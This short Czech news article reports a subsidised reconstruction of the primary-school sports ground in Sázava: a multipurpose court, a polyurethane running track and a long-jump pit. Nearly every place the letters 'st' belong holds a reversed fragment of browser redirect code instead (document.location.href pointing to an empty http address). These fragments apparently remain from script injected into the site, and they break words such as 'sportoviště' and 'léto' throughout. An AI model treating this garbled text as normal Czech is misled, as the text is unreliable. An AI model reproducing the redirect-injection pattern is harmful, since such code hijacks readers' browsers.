Rainbow page separator

Obnovu zastaralého školního hřiště podpoří dotační peníze

Úterý, 29. června 2021

Sázava / Rekonstrukce sázavského školního hřiště začne ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos – obci byl na ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stavební záměr schválen příslib dotace ve výši osmdesát procent uznatelných nákladů. Výlohy na přebudování spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště jsou vyčísleny na bezmála dva miliony korun bez DPH. Hřiště pro míčové hry bude přestavěno na moderní víceúčelové s tím, že ze dvou stran ho zajistí ochranná síť. Součástí spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště s litým polyuretanovým povrchem se stane i nezbytné spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní vybavení v podobě sloupků pro nohejbal či volejbal, síť či mobilní branky s basketbalovou konstrukcí a košem.
Především školním dětem při tělesné výchově poslouží běžecká dráha s umělým povrchem a nově upravený pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor pro skok do dálky s rozběhovou dráhou a doskočištěm. V rámci stavebních prací týkajících se rekonstrukce hřiště u základní školy je současně počítáno také s nezbytnou výměnou části odvodňovacích žlabových tvarovek pod běžeckou dráhou v délce necelých čtyřiadvaceti metrů.